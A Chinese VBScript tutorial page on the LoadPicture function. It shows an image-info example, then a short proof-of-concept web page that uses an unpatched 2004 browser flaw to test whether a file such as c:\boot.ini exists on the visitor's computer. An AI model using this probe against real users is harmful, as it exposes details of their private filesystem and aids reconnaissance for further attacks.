当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > vbscript LoadPicture函数使用方法与漏洞利用

VBScript
ActiveX漏洞通用Exploit vbs修正版
一个扩展时间段的dir命令的vbs脚本
Rcmd.vbs [Remote Cmd with wmi]远程脚本
Rcmd.vbs 1.01修正版 增加了下载功能
将VBS或ASP中的代码转成一句话形式
FileSystemObject 示例代码
灵活实用的VBS入门教程基础篇
vbs实用软件自造:Windows脚本应用实例
好玩的vbs特色代码
vbs实现的下拉框对应键入值
用vbs实现防止计算机使用 LMHosts 文件
vbs脚本大全,配有实例 DOS命令,批处理 脚本 代码
vbscript下调用 Dir 命令的方法
用vbscript实现从后到前阅读一个文本文件
用vbs实现zip功能的脚本
vbs搜索文件名或者得到目录列表
vbs shellcode转换escape加密
ADOX.Catalog中文帮助详细说明chm文档
vbs Windows系统改变或修改网卡的MAC地址的脚本与软件
IE浏览器增加“复制图像地址”的右键菜单的vbs代码

VBScript 中的 vbscript LoadPicture函数使用方法与漏洞利用


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 79 ::
收藏到网摘: n/a

by:lcx
示例:
<title>LoadPicture函数</title>
<form name="frm">
选择图片<input type="file" name="pic" onChange="GetPicInfor()" >
</form>
<script language="vbscript">
Sub GetPicInfor()
dim objpic,iWidth,iHeight
dim pictype,picpath
picpath=document.frm.pic.value
set objpic=Loadpicture(picpath)
iWidth = round(objpic.width / 26.4583) ‘26.4583是像素值
iHeight = round(objpic.height / 26.4583)
select case objpic.type
case 0
pictype = "None"
case 1
pictype = "Bitmap"
case 2
pictype = "Metafile"
case 3
pictype = "Icon"
case 4
pictype = "Win32-enhanced metafile"
end select
document.write "你选择了图片"&picpath
document.write "<li>长度:"&iHeight&"</li>"
document.write "<li>宽度:"&iwidth&"</li>"
document.write "<li>类型:"&pictype&"</li>"
End Sub
</script>
=============================
不过这个函数有个漏洞,可以探测电脑上存在的文件名。2004年的漏洞,微软现在也没补,示例:
<form onsubmit="doIt(this);return false">
<input name="filename" value="c:\boot.ini" size="80" type="text"><input type="submit">
</form>
<script language="vbscript">
Sub loadIt(filename)
LoadPicture(filename)
End Sub
</script>
<script language="javascript">
function doIt(form) {
try {
loadIt(form.filename.value);
} catch(e) {
result = e.number;
}
if (result != -2146827856) {
alert('file exists');
} else {
alert('file does not exist');
}
}
</script>